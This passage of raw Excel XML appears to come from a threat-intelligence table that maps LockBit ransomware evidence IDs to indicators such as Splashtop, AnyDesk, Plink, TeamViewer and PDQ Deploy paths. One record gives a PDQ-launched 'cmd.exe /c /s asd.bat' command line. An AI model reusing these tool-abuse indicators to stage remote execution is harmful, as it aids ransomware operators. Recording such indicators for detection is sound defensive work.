    <s v="SoftPerfect NetScan"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="lockbit-eid0118"/>
    <m/>
    <s v="file_name"/>
    <s v="SRUtility.exe "/>
    <s v="Splashtop"/>
    <x v="1"/>
  </r>
  <r>
    <s v="lockbit-eid0119"/>
    <s v="anydesk-pid"/>
    <s v="file_name"/>
    <s v="AnyDeskMSI.exe "/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="lockbit-eid0120"/>
    <m/>
    <s v="htool"/>
    <s v="Plink"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="lockbit-eid0121"/>
    <s v="teamvwr-pid"/>
    <s v="htool"/>
    <s v="Teamviewer"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="lockbit-eid0122"/>
    <s v="pdq-pid"/>
    <s v="htool"/>
    <s v="%windir%\AdminArsenal\PDQDeployRunner\PDQDeployRunner\service-1\PDQDeployRunner-1.exe"/>
    <s v="PDQDeployRunner-n (e.g., PDQDeployRunner-1) is the target service executed on remote hosts to perform the deployments."/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0123"/>
    <s v="pdq-pid"/>
    <s v="object"/>
    <s v="{&quot;obj_type&quot;: &quot;cmdline&quot;, &quot;initiating_process_path&quot;: &quot;c:\Windows\AdminArsenal\PDQDeployRunner\service-1\PDQDeployRunner-1.exe&quot;, &quot;process_cmdline&quot;: &quot;cmd.exe /c /s asd.bat&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="lockbit-eid0124"/>
    <s v="pdq-pid"/>
    <s v="file_path"/>
    <s v="c:\Program Files (x86)\Admin Arsenal\PDQ Deploy\PDQDeployService.exe"/>
    <s v="PDQDeployService.exe is the background service that manages all schedules and deployments on the consol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0DCFF-9372-1242-90A5-B95E3A230EA9}" name="PivotTable5"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6">
    <pivotField showAll="0"/>
    <pivotField dataField="1" showAll="0"/>
    <pivotField dataField="1" showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField showAll="0"/>
    <pivotField axis="axisRow" showAll="0">
      <items count="5">
        <item x="1"/>
        <item m="1" x="2"/>
        <item m="1" x="3"/>
        <item x="0"/>
        <item t="default"/>
      </items>
    </pivotField>
  </pivotFields>
  <rowFields count="1">
    <field x="5"/>
  </rowFields>
  <rowItems count="3">
    <i>
      <x/>
    </i>
    <i>
      <x v="3"/>
    </i>
    <i t="grand">
      <x/>
    </i>
  </rowItems>
  <colFields count="1">
    <field x="-2"/>
  </colFields>
  <colItems count="2">
    <i>
      <x/>
    </i>
    <i i="1">
      <x v="1"/>
    </i>
  </colItems>
  <dataFields count="2">
    <dataField name="Count of map_pid" fld="1" subtotal="count" baseField="0" baseItem="0"/>
    <dataField name="Count of eid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889FB-1522-0A4D-8EB6-D259755FECDF}" name="Table1" displayName="Table1" ref="A1:F125" totalsRowShown="0" dataDxfId="6">
  <autoFilter ref="A1:F125" xr:uid="{C77889FB-1522-0A4D-8EB6-D259755FECDF}"/>
  <sortState xmlns:xlrd2="http://schemas.microsoft.com/office/spreadsheetml/2017/richdata2" ref="A2:F125">
    <sortCondition ref="A1:A125"/>
  </sortState>
  <tableColumns count="6">
    <tableColumn id="7" xr3:uid="{5516EDED-B058-144E-976C-0B23FABA65AE}" name="eid" dataDxfId="5"/>
    <tableColumn id="4" xr3:uid="{0B947D48-DA4A-7C49-9C7F-01EFE6AFBBF9}" name="map_pid" dataDxfId="4"/>
    <tableColumn id="1" xr3:uid="{1ED6D649-59BA-E14C-BBA6-23BD7EBDEB94}" name="eid_type" dataDxfId="3"/>
    <tableColumn id="6" xr3:uid="{16A9BF58-E113-7848-AEB0-6F8A9E864CF3}" name="evidence" dataDxfId="2"/>
    <tableColumn id="2" xr3:uid="{794120D3-18F6-5949-81E6-52D88B752F29}" name="description" dataDxfId="1"/>
    <tableColumn id="5" xr3:uid="{85834C32-2D65-CD48-92FE-AB72134D121E}" name="ns_meta"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31F7E-D5A5-3A4E-9B01-AFDB66077813}">
  <dimension ref="A3:C6"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="A11" sqref="A11"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="164" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="15.5" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="15.33203125" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="3" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A3" s="3" t="s">
        <v>290</v>
      </c>
      <c r="B3" t="s">
        <v>292</v>
      </c>
      <c r="C3" t="s">
        <v>293</v>
      </c>
    </row>
    <row r="4" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A4" s="4" t="s">
        <v>220</v>
      </c>
      <c r="B4" s="5">
        <v>8</v>
      </c>
      <c r="C4" s="5">
        <v>31</v>
      </c>
    </row>
    <row r="5" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A5" s="4" t="s">
        <v>294</v>
      </c>
      <c r="B5" s="5">
        <v>39</v>
      </c>
      <c r="C5" s="5">
        <v>93</v>
      </c>
    </row>
    <row r="6" spans="1:3" x14ac:dyDescent="0.2">
      <c r="A6" s="4" t="s">
        <v>291</v>
      </c>
      <c r="B6" s="5">
        <v>47</v>
      </c>
      <c r="C6" s="5">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5849-2682-F643-8842-EFF560F6FB5C}">
  <dimension ref="A1:F125"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="F125" sqref="F125"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <cols>
    <col min="1" max="1" width="15.1640625" customWidth="1"/>
    <col min="2" max="2" width="22" customWidth="1"/>
    <col min="3" max="3" width="13.6640625" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="132" customWidth="1"/>
    <col min="5" max="5" width="58" customWidth="1"/>
    <col min="6" max="6" width="100.83203125" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:6" x14ac:dyDescent="0.2">
      <c r="A1" t="s">
        <v>0</v>
      </c>
      <c r="B1" t="s">
        <v>1</v>
      </c>
      <c r="C1" t="s">
        <v>5</v>
      </c>
      <c r="D1" t="s">
        <v>3</v>
      </c>
      <c r="E1" t="s">
        <v>2</v>
      </c>
      <c r="F1" t="s">
        <v>4</v>
      </c>
    </row>
    <row r="2" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A2" s="1" t="s">
        <v>7</v>
      </c>
      <c r="B2" s="1" t="s">
        <v>267</v>
      </c>
      <c r="C2" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D2" s="1" t="s">
        <v>131</v>
      </c>
      <c r="E2" s="1"/>
      <c r="F2" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="3" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A3" s="1" t="s">
        <v>8</v>
      </c>
      <c r="B3" s="1" t="s">
        <v>267</v>
      </c>
      <c r="C3" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D3" s="1" t="s">
        <v>132</v>
      </c>
      <c r="E3" s="1"/>
      <c r="F3" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="4" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A4" s="1" t="s">
        <v>9</v>
      </c>
      <c r="B4" s="1" t="s">
        <v>268</v>
      </c>
      <c r="C4" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D4" s="1" t="s">
        <v>133</v>
      </c>
      <c r="E4" s="1"/>
      <c r="F4" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="5" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A5" s="1" t="s">
        <v>10</v>
      </c>
      <c r="B5" s="1" t="s">
        <v>269</v>
      </c>
      <c r="C5" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D5" s="1" t="s">
        <v>134</v>
      </c>
      <c r="E5" s="1"/>
      <c r="F5" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="6" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A6" s="1" t="s">
        <v>11</v>
      </c>
      <c r="B6" s="1" t="s">
        <v>270</v>
      </c>
      <c r="C6" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D6" s="1" t="s">
        <v>135</v>
      </c>
      <c r="E6" s="1"/>
      <c r="F6" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="7" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A7" s="1" t="s">
        <v>12</v>
      </c>
      <c r="B7" s="1" t="s">
        <v>271</v>
      </c>
      <c r="C7" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D7" s="1" t="s">
        <v>136</v>
      </c>
      <c r="E7" s="1"/>
      <c r="F7" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="8" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A8" s="1" t="s">
        <v>13</v>
      </c>
      <c r="B8" s="1"/>
      <c r="C8" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D8" s="1" t="s">
        <v>137</v>
      </c>
      <c r="E8" s="1"/>
      <c r="F8" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="9" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A9" s="1" t="s">
        <v>14</v>
      </c>
      <c r="B9" s="1"/>
      <c r="C9" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D9" s="1" t="s">
        <v>138</v>
      </c>
      <c r="E9" s="1"/>
      <c r="F9" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="10" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A10" s="1" t="s">
        <v>15</v>
      </c>
      <c r="B10" s="1"/>
      <c r="C10" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D10" s="1" t="s">
        <v>139</v>
      </c>
      <c r="E10" s="1"/>
      <c r="F10" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="11" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A11" s="1" t="s">
        <v>16</v>
      </c>
      <c r="B11" s="1"/>
      <c r="C11" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D11" s="1" t="s">
        <v>140</v>
      </c>
      <c r="E11" s="1"/>
      <c r="F11" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="12" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A12" s="1" t="s">
        <v>17</v>
      </c>
      <c r="B12" s="1" t="s">
        <v>267</v>
      </c>
      <c r="C12" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D12" s="1" t="s">
        <v>141</v>
      </c>
      <c r="E12" s="1"/>
      <c r="F12" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="13" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A13" s="1" t="s">
        <v>18</v>
      </c>
      <c r="B13" s="1" t="s">
        <v>267</v>
      </c>
      <c r="C13" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D13" s="1" t="s">
        <v>142</v>
      </c>
      <c r="E13" s="1"/>
      <c r="F13" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="14" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A14" s="1" t="s">
        <v>19</v>
      </c>
      <c r="B14" s="1" t="s">
        <v>272</v>
      </c>
      <c r="C14" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D14" s="1" t="s">
        <v>143</v>
      </c>
      <c r="E14" s="1"/>
      <c r="F14" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="15" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A15" s="1" t="s">
        <v>20</v>
      </c>
      <c r="B15" s="1" t="s">
        <v>268</v>
      </c>
      <c r="C15" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D15" s="1" t="s">
        <v>144</v>
      </c>
      <c r="E15" s="1"/>
      <c r="F15" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="16" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A16" s="1" t="s">
        <v>21</v>
      </c>
      <c r="B16" s="1" t="s">
        <v>268</v>
      </c>
      <c r="C16" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D16" s="1" t="s">
        <v>145</v>
      </c>
      <c r="E16" s="1"/>
      <c r="F16" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="17" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A17" s="1" t="s">
        <v>22</v>
      </c>
      <c r="B17" s="1" t="s">
        <v>273</v>
      </c>
      <c r="C17" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D17" s="1" t="s">
        <v>146</v>
      </c>
      <c r="E17" s="1"/>
      <c r="F17" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="18" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A18" s="1" t="s">
        <v>23</v>
      </c>
      <c r="B18" s="1" t="s">
        <v>273</v>
      </c>
      <c r="C18" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D18" s="1" t="s">
        <v>147</v>
      </c>
      <c r="E18" s="1"/>
      <c r="F18" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="19" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A19" s="1" t="s">
        <v>24</v>
      </c>
      <c r="B19" s="1" t="s">
        <v>273</v>
      </c>
      <c r="C19" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D19" s="1" t="s">
        <v>148</v>
      </c>
      <c r="E19" s="1"/>
      <c r="F19" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="20" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A20" s="1" t="s">
        <v>25</v>
      </c>
      <c r="B20" s="1" t="s">
        <v>273</v>
      </c>
      <c r="C20" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D20" s="1" t="s">
        <v>149</v>
      </c>
      <c r="E20" s="1"/>
      <c r="F20" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="21" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A21" s="1" t="s">
        <v>26</v>
      </c>
      <c r="B21" s="1" t="s">
        <v>273</v>
      </c>
      <c r="C21" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D21" s="1" t="s">
        <v>150</v>
      </c>
      <c r="E21" s="1"/>
      <c r="F21" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="22" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A22" s="1" t="s">
        <v>27</v>
      </c>
      <c r="B22" s="1" t="s">
        <v>274</v>
      </c>
      <c r="C22" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D22" s="1" t="s">
        <v>151</v>
      </c>
      <c r="E22" s="1"/>
      <c r="F22" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="23" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A23" s="1" t="s">
        <v>28</v>
      </c>
      <c r="B23" s="1" t="s">
        <v>275</v>
      </c>
      <c r="C23" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D23" s="1" t="s">
        <v>152</v>
      </c>
      <c r="E23" s="1"/>
      <c r="F23" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="24" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A24" s="1" t="s">
        <v>29</v>
      </c>
      <c r="B24" s="1" t="s">
        <v>276</v>
      </c>
      <c r="C24" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D24" s="1" t="s">
        <v>153</v>
      </c>
      <c r="E24" s="1"/>
      <c r="F24" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="25" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A25" s="1" t="s">
        <v>30</v>
      </c>
      <c r="B25" s="1"/>
      <c r="C25" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D25" s="1" t="s">
        <v>154</v>
      </c>
      <c r="E25" s="1"/>
      <c r="F25" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="26" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A26" s="1" t="s">
        <v>31</v>
      </c>
      <c r="B26" s="1"/>
      <c r="C26" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D26" s="1" t="s">
        <v>155</v>
      </c>
      <c r="E26" s="1"/>
      <c r="F26" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="27" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A27" s="1" t="s">
        <v>32</v>
      </c>
      <c r="B27" s="1" t="s">
        <v>273</v>
      </c>
      <c r="C27" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D27" s="1" t="s">
        <v>156</v>
      </c>
      <c r="E27" s="1"/>
      <c r="F27" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="28" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A28" s="1" t="s">
        <v>33</v>
      </c>
      <c r="B28" s="1"/>
      <c r="C28" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D28" s="1" t="s">
        <v>157</v>
      </c>
      <c r="E28" s="1"/>
      <c r="F28" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="29" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A29" s="1" t="s">
        <v>34</v>
      </c>
      <c r="B29" s="1"/>
      <c r="C29" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D29" s="1" t="s">
        <v>158</v>
      </c>
      <c r="E29" s="1"/>
      <c r="F29" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="30" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A30" s="1" t="s">
        <v>35</v>
      </c>
      <c r="B30" s="1"/>
      <c r="C30" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D30" s="1" t="s">
        <v>159</v>
      </c>
      <c r="E30" s="1"/>
      <c r="F30" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="31" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A31" s="1" t="s">
        <v>36</v>
      </c>
      <c r="B31" s="1"/>
      <c r="C31" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D31" s="1" t="s">
        <v>160</v>
      </c>
      <c r="E31" s="1"/>
      <c r="F31" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="32" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A32" s="1" t="s">
        <v>37</v>
      </c>
      <c r="B32" s="1"/>
      <c r="C32" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D32" s="1" t="s">
        <v>161</v>
      </c>
      <c r="E32" s="1"/>
      <c r="F32" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="33" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A33" s="1" t="s">
        <v>38</v>
      </c>
      <c r="B33" s="1" t="s">
        <v>277</v>
      </c>
      <c r="C33" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D33" s="1" t="s">
        <v>265</v>
      </c>
      <c r="E33" s="1" t="s">
        <v>264</v>
      </c>
      <c r="F33" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="34" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A34" s="1" t="s">
        <v>39</v>
      </c>
      <c r="B34" s="1" t="s">
        <v>268</v>
      </c>
      <c r="C34" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D34" s="1" t="s">
        <v>266</v>
      </c>
      <c r="E34" s="1"/>
      <c r="F34" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="35" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A35" s="1" t="s">
        <v>40</v>
      </c>
      <c r="B35" s="1"/>
      <c r="C35" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D35" s="1" t="s">
        <v>162</v>
      </c>
      <c r="E35" s="1"/>
      <c r="F35" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="36" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A36" s="1" t="s">
        <v>41</v>
      </c>
      <c r="B36" s="1"/>
      <c r="C36" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D36" s="1" t="s">
        <v>163</v>
      </c>
      <c r="E36" s="1" t="s">
        <v>164</v>
      </c>
      <c r="F36" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="37" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A37" s="1" t="s">
        <v>42</v>
      </c>
      <c r="B37" s="1" t="s">
        <v>276</v>
      </c>
      <c r="C37" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D37" s="1" t="s">
        <v>165</v>
      </c>
      <c r="E37" s="1"/>
      <c r="F37" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="38" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A38" s="1" t="s">
        <v>43</v>
      </c>
      <c r="B38" s="1"/>
      <c r="C38" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D38" s="1" t="s">
        <v>166</v>
      </c>
      <c r="E38" s="1"/>
      <c r="F38" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="39" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A39" s="1" t="s">
        <v>44</v>
      </c>
      <c r="B39" s="1"/>
      <c r="C39" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D39" s="1" t="s">
        <v>167</v>
      </c>
      <c r="E39" s="1"/>
      <c r="F39" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="40" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A40" s="1" t="s">
        <v>45</v>
      </c>
      <c r="B40" s="1" t="s">
        <v>273</v>
      </c>
      <c r="C40" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D40" s="1" t="s">
        <v>168</v>
      </c>
      <c r="E40" s="1"/>
      <c r="F40" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="41" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A41" s="1" t="s">
        <v>46</v>
      </c>
      <c r="B41" s="1" t="s">
        <v>273</v>
      </c>
      <c r="C41" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D41" s="1" t="s">
        <v>169</v>
      </c>
      <c r="E41" s="1"/>
      <c r="F41" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="42" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A42" s="1" t="s">
        <v>47</v>
      </c>
      <c r="B42" s="1" t="s">
        <v>273</v>
      </c>
      <c r="C42" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D42" s="1" t="s">
        <v>170</v>
      </c>
      <c r="E42" s="1"/>
      <c r="F42" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="43" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A43" s="1" t="s">
        <v>48</v>
      </c>
      <c r="B43" s="1" t="s">
        <v>273</v>
      </c>
      <c r="C43" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D43" s="1" t="s">
        <v>171</v>
      </c>
      <c r="E43" s="1"/>
      <c r="F43" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="44" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A44" s="1" t="s">
        <v>49</v>
      </c>
      <c r="B44" s="1" t="s">
        <v>273</v>
      </c>
      <c r="C44" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D44" s="1" t="s">
        <v>172</v>
      </c>
      <c r="E44" s="1"/>
      <c r="F44" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="45" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A45" s="1" t="s">
        <v>50</v>
      </c>
      <c r="B45" s="1"/>
      <c r="C45" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D45" s="1" t="s">
        <v>173</v>
      </c>
      <c r="E45" s="1" t="s">
        <v>174</v>
      </c>
      <c r="F45" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="46" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A46" s="1" t="s">
        <v>51</v>
      </c>
      <c r="B46" s="1" t="s">
        <v>274</v>
      </c>
      <c r="C46" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D46" s="1" t="s">
        <v>175</v>
      </c>
      <c r="E46" s="1"/>
      <c r="F46" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="47" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A47" s="1" t="s">
        <v>52</v>
      </c>
      <c r="B47" s="1"/>
      <c r="C47" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D47" s="1" t="s">
        <v>176</v>
      </c>
      <c r="E47" s="1"/>
      <c r="F47" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="48" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A48" s="1" t="s">
        <v>53</v>
      </c>
      <c r="B48" s="1" t="s">
        <v>278</v>
      </c>
      <c r="C48" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D48" s="1" t="s">
        <v>177</v>
      </c>
      <c r="E48" s="1"/>
      <c r="F48" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="49" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A49" s="1" t="s">
        <v>54</v>
      </c>
      <c r="B49" s="1" t="s">
        <v>279</v>
      </c>
      <c r="C49" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D49" s="1" t="s">
        <v>178</v>
      </c>
      <c r="E49" s="1"/>
      <c r="F49" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="50" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A50" s="1" t="s">
        <v>55</v>
      </c>
      <c r="B50" s="1"/>
      <c r="C50" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D50" s="1" t="s">
        <v>179</v>
      </c>
      <c r="E50" s="1"/>
      <c r="F50" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="51" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A51" s="1" t="s">
        <v>56</v>
      </c>
      <c r="B51" s="1" t="s">
        <v>280</v>
      </c>
      <c r="C51" s="1" t="s">
        <v>6</v>
      </c>
      <c r="D51" s="1" t="s">
        <v>180</v>
      </c>
      <c r="E51" s="1"/>
      <c r="F51" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="52" spans="1:6" ht="409.6" x14ac:dyDescent="0.2">
      <c r="A52" s="1" t="s">
        <v>57</v>
      </c>
      <c r="B52" s="1"/>
      <c r="C52" s="1" t="s">
        <v>181</v>
      </c>
      <c r="D52" s="1" t="s">
        <v>284</v>
      </c>
      <c r="E52" s="1"/>
      <c r="F52" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="53" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A53" s="1" t="s">
        <v>58</v>
      </c>
      <c r="B53" s="1"/>
      <c r="C53" s="1" t="s">
        <v>182</v>
      </c>
      <c r="D53" s="1" t="s">
        <v>283</v>
      </c>
      <c r="E53" s="1"/>
      <c r="F53" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="54" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A54" s="1" t="s">
        <v>59</v>
      </c>
      <c r="B54" s="1"/>
      <c r="C54" s="1" t="s">
        <v>182</v>
      </c>
      <c r="D54" s="1" t="s">
        <v>282</v>
      </c>
      <c r="E54" s="1"/>
      <c r="F54" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="55" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A55" s="1" t="s">
        <v>60</v>
      </c>
      <c r="B55" s="1"/>
      <c r="C55" s="1" t="s">
        <v>182</v>
      </c>
      <c r="D55" s="1" t="s">
        <v>183</v>
      </c>
      <c r="E55" s="1"/>
      <c r="F55" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="56" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A56" s="1" t="s">
        <v>61</v>
      </c>
      <c r="B56" s="1"/>
      <c r="C56" s="1" t="s">
        <v>182</v>
      </c>
      <c r="D56" s="1" t="s">
        <v>184</v>
      </c>
      <c r="E56" s="1"/>
      <c r="F56" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="57" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A57" s="1" t="s">
        <v>62</v>
      </c>
      <c r="B57" s="1"/>
      <c r="C57" s="1" t="s">
        <v>182</v>
      </c>
      <c r="D57" s="1" t="s">
        <v>185</v>
      </c>
      <c r="E57" s="1"/>
      <c r="F57" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="58" spans="1:6" ht="34" x14ac:dyDescent="0.2">
      <c r="A58" s="1" t="s">
        <v>63</v>
      </c>
      <c r="B58" s="1"/>
      <c r="C58" s="1" t="s">
        <v>182</v>
      </c>
      <c r="D58" s="1" t="s">
        <v>186</v>
      </c>
      <c r="E58" s="1"/>
      <c r="F58" s="1" t="s">
        <v>294</v>
      </c>
    </row>
    <row r="59" spans="1:6" ht="34" x14ac:dyDescent="0.2">
